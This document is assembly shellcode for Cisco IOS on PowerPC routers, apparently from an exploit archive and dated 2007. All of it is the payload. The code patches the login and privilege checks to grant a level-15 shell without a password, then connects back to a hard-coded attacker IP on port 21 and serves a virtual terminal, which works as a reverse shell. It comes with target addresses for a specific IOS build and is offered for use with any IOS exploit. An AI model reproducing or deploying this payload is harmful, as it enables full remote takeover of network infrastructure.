Cisco IOS - Connectback shellcode v1.0

# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back 
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# 
#
# The following five hard-coded addresses must be located for the target IOS version. 
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8 
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------

main:
	stwu 1,-48(1)
	mflr 0
	stw 31,44(1)
	stw 0,52(1)
	mr 31,1
	li 3,512
	lis 9,malloc@ha  #malloc() memory for tcp structure
	la 9,malloc@l(9)
	mtctr 9
	bctrl
	mr 0,3
	stw 0,20(31)
	lwz 9,12(31)
	li 0,1
	stb 0,0(9)
	lwz 9,12(31)
	lis 0,0xac1e #  connect back ip address 
	ori 0,0,1018 #
	stw 0,4(9)
	li 3,66
	li 4,0
	lis 9,allocate_tty@ha  # allocate new TTY
	la 9,allocate_tty@l(9)
	mtctr 9
	bctrl
	addi 0,31,24

	# Fix TTY structure to enable level 15 shell without password
	# 
	#
	##########################################################

	# login patch begin
	lis 9, login@ha
	la 9, login@l(9)
	li 8,0
	stw 8, 0(9)
	# login patch end

	#IDA placeholder for con0
	#
	# lis     %r9, ((stdio+0x10000)@h)
        # lwz     %r9, stdio@l(%r9)
        # lwz     %r0, 0xDE4(%r9) #priv struct
        #
	# priv patch begin
	lis 9, priv@ha
	la 9, priv@l(9)
	lis 8, god@ha
	la 8, god@l(8)
	stw 8, 0(9)
	# priv patch end 
	
	###########################################################

	li 3,0
	li 4,21		# Port 21 for connectback
	lwz 5,12(31)
	li 6,0
	li 7,0
	mr 8,0
	li 9,0
	lis 11,tcp_connect@ha 	# Connect to attacker IP
	la 11,tcp_connect@l(11)
	mtctr 11
	bctrl
	mr 0,3
	stw 0,20(31)
	li 3,66
	lwz 4,20(31)
	li 5,0
	li 6,0
	li 7,0
	li 8,0
	li 9,0
	li 10,0
	lis 11,tcp_execute_command@ha   # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
	la 11,tcp_execute_command@l(11)
	mtctr 11
	bctrl
	lwz 11,0(1)
	lwz 0,4(11)
	mtlr 0
	lwz 31,-4(11)
	mr 1,11

	###########################################
	lis     9, addr@ha		
        addi    0, 9, addr@l
        mtctr   0
        xor 3,3,3
        addi    3,0, -2
        lis     10, str@ha
        addi    4, 10, str@l
        bctrl
        lis     10, ret@ha
        addi    4, 10, ret@l
        mtctr   4
        bctrl